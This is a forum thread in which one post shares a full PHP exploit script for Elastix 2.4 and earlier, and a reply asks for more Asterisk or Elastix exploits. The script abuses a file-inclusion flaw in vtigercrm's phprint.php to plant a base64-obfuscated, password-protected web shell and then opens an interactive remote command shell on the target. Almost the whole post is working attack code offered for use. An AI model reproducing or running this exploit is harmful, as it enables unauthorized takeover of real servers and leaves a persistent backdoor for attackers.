a.linm Posted September 6, 2015 Report Posted September 6, 2015 <?echo "n+-------------------------------------------+n";echo "| Elastix <= 2.4 |n";echo "| PHP Code Injection Exploit |n";echo "| By i-Hmx |n";echo "| sec4ever.com |n";echo "| n0p1337@gmail.com |n";echo "+-------------------------------------------+n";echo "n| Enter Target [https://ip] # ";$target=trim(fgets(STDIN));$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo=")); ?>';$faf=fopen("fa.txt","w+");fwrite($faf,$inj);fclose($faf);$myf='fa.txt';$url = $target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00"; // URL$reffer = "http://1337s.cc/index.php";$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";$cookie_file_path = "/";echo "| Injecting 1st payloadn";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_USERAGENT, $agent);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_REFERER, $reffer);curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);$result = curl_exec($ch);curl_close($ch);//echo $result;echo "| Injecting 2nd payloadn";function faget($url,$post){$curl=curl_init();curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);curl_setopt($curl,CURLOPT_URL,$url);curl_setopt($curl, CURLOPT_POSTFIELDS,$post);curl_setopt($curl, CURLOPT_COOKIEFILE, '/');curl_setopt($curl, CURLOPT_COOKIEJAR, '/');curl_setopt($curl, 
CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);curl_setopt($curl,CURLOPT_TIMEOUT,20);curl_setopt($curl, CURLOPT_HEADER, true);$exec=curl_exec($curl);curl_close($curl);return $exec;}function kastr($string, $start, $end){$string = " ".$string;$ini = strpos($string,$start);if ($ini == 0) return "";$ini += strlen($start);$len = strpos($string,$end,$ini) - $ini;return substr($string,$ini,$len);}$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");echo "| Testing total payloadn";$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");if(!eregi("Faris on the mic :D",$total)){die("[+] Exploitation Failedn");}echo "| Sending CMD test packagen";$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");if(!eregi("farsawy",$cmd)){echo " + Cmd couldn't executed but we can evaluate php coden + use : $target//vtigercrm/fa.phpn Post : fa=base64coden";}echo "| sec4ever shell online ;)nn";$host=str_replace('https://','',$target);while(1){echo "i-Hmx@$host# ";$c=trim(fgets(STDIN));if($c=='exit'){die("[+] Terminatingn");}$payload=base64_encode("passthru('$c');");$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");$done=kastr($fuck,"-----------------","-----------------");echo "$donen";}/*I dont even remember when i exploited this shit!maybe on 2013?!whatever , Hope its not sold as 0day in the near future xDD*/?>https://cxsecurity.com/issue/WLB-2015090035 Quote
mafimuskilas Posted October 15, 2015: Does anybody have an Asterisk or Elastix exploit to share? I would appreciate it. Thanks.